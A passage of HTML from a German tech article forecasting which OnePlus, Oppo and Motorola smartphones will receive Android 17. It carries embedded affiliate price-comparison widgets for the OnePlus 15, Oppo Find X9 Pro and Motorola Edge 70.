<li><a href="https://www.pcwelt.de/article/2582777/oneplus-13-test-smartphone-unter-1000-euro.html" target="_blank" rel="noreferrer noopener">OnePlus 13</a></li>



<li><a href="https://www.pcwelt.de/article/2581125/oneplus-13r-im-test-grossartiger-allrounder-mit-toller-leistung.html" target="_blank" rel="noreferrer noopener">OnePlus 13R</a></li>



<li><a href="https://www.pcwelt.de/article/2218966/oneplus-12-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12</a></li>



<li><a href="https://www.pcwelt.de/article/2231965/oneplus-12r-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12R</a></li>



<li><a href="https://www.pcwelt.de/article/1812962/oneplus-11-test-smartphone.html" target="_blank" rel="noreferrer noopener">Oneplus 11 5G</a></li>



<li>Oneplus Open</li>



<li><a href="https://www.pcwelt.de/article/2852837/oneplus-nord-ce-5-test.html" target="_blank" rel="noreferrer noopener">OnePlus Nord CE5</a></li>



<li><a href="https://www.pcwelt.de/article/2847544/oneplus-nord-5-test-2.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 5</a></li>



<li>Oneplus Nord CE4</li>



<li><a href="https://www.pcwelt.de/article/2420699/oneplus-nord-4-test.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 4</a></li>
</ul>



<p><br><strong>Voraussichtlich kein Android 17:</strong> OnePlus 10 Pro, 10T, 10R, Nord 3 5G, Nord CE 3 Lite 5G, Nord CE4 Lite 5G.</p>



<p><strong>OnePlus 15 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>785,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260618&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="785,99 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 785,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>793,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YoC8g8m59ZIvsU1Wdh-mdc5Hd99OQeF7SKLOq6-gxvVEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260618&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YoC8g8m59ZIvsU1Wdh-mdc5Hd99OQeF7SKLOq6-gxvVEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="793,90 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 793,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260618&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>849,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260618&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="849,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 849,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/oneplus-logo.svg" alt="OnePlus" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-price="949,00 €" data-vars-product-vendor="OnePlus" aria-label="Deal anschauen bei OnePlus für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Oppo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf35109"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260222_112411266.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Oppo Find X9 Pro" class="wp-image-3067642" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Bei Oppo stehen die Chancen für die meisten, neueren Smartphones ebenfalls gut, das Update auf Android 17 zu erhalten. Ältere Reno- oder Find-Modelle fallen aber schon bald aus dem Support heraus und sind daher nicht mehr dabei.</p>



<p>Diese Oppo-Smartphones bekommen voraussichtlich Android 17:</p>



<ul class="wp-block-list">
<li>Find N6</li>



<li><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Find X9</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2875375/oppo-a5-5g-test.html" target="_blank" rel="noreferrer noopener">A5 5G</a> / <a href="https://www.pcwelt.de/article/2874342/oppo-a5-pro-5g-test.html" target="_blank" rel="noreferrer noopener">5G Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2882216/oppo-a40-test.html" target="_blank" rel="noreferrer noopener">A40</a></li>



<li>Reno 15 / Pro</li>



<li>Reno 14 / Pro</li>



<li>Reno 13 / Pro / F / FS</li>



<li>Find X8 /<a href="https://www.pcwelt.de/article/2546364/oppo-find-x8-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a> / Ultra</li>



<li>Find X7 / Ultra</li>



<li>Find N5 </li>
</ul>



<p><strong>Wahrscheinlich kein Android 17:</strong> Find X6, Find X6 Pro, Find X5, Find X5 Lite, Find X5 Pro, Find N2, Find N2 Flip, Reno 12, Reno 12 Pro, Reno 12 F, Reno 12 FS, Reno 11, Reno 11 Pro, Reno 11 F, Reno 11 FS.</p>



<p><strong>Oppo Find X9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.149,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260618&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.149,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.149,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Galaxus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Galaxus" aria-label="Deal anschauen bei Galaxus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260618&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Motorola</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf39c22"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260217_075728904.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Motorola Signature gränssnitt" class="wp-image-3062983" width="1200" height="841" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Motorola ist ein etwas schwieriger Fall. Denn obwohl alle Hersteller gleichermaßen von der EU-Regelung betroffen sind, mindestens fünf Jahre Updates zu liefern, meinte das Unternehmen lange Zeit, ein “Schlupfloch” in dieser Aussage gefunden zu haben. Daher verspricht es für einige Geräte nur vier Android-Updates.</p>



<p>Ob sich das bewahrheitet, wird sich erst noch zeigen müssen. Diese Motorola-Smartphones bekommen aber mit großer Wahrscheinlichkeit Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3068644/motorola-signature-test.html" target="_blank" rel="noreferrer noopener">Signature</a></li>



<li><a href="https://www.pcwelt.de/article/2986379/motorola-edge-70-test.html" target="_blank" rel="noreferrer noopener">Edge 70</a></li>



<li><a href="https://www.pcwelt.de/article/2839163/motorola-edge-60-test-2.html" target="_blank" rel="noreferrer noopener">Edge 60</a> / Ultra / <a href="https://www.pcwelt.de/article/2824306/motorola-edge-60-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3042698/motorola-edge-60-fusion-test.html" target="_blank" rel="noreferrer noopener">Fusion </a>/ Neo</li>



<li>Edge 50 / <a href="https://www.pcwelt.de/article/2367963/motorola-edge-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2332502/motorola-edge-50-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pro</a> / Fusion / Neo</li>



<li>Razr 60 / <a href="https://www.pcwelt.de/article/2764578/motorola-razr-60-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2447520/motorola-razr-50-im-test-faltbares-smartphone-zum-erschwinglichen-preis.html" target="_blank" rel="noreferrer noopener">Razr 50</a> / <a href="https://www.pcwelt.de/article/2603789/motorola-razr-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Neo</li>



<li>Moto G56</li>



<li><a href="https://www.pcwelt.de/article/2572797/motorola-moto-g75-test-2.html" target="_blank" rel="noreferrer noopener">Moto G75</a></li>



<li>Moto G86</li>



<li>Moto G86 Power</li>



<li>Lenovo Thinkphone 25</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Edge 40, Edge 40 Pro, Edge 40 Neo, Razr 40, Razr 40 Ultra, Razr 40 Neo, Moto G35, Moto G45, Moto G55, Moto G85, Lenovo Thinkphone.</p>



<p><strong>Motorola Edge 70 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>389,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kAQML0rN-UqgFdiMIpCMzPfU9WrD2chB77nY_gEpKI5He66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260618&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kAQML0rN-UqgFdiMIpCMzPfU9WrD2chB77nY_gEpKI5He66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="389,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 389,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>425,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260618&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="425,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 425,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>483,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260618&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="483,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 483,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
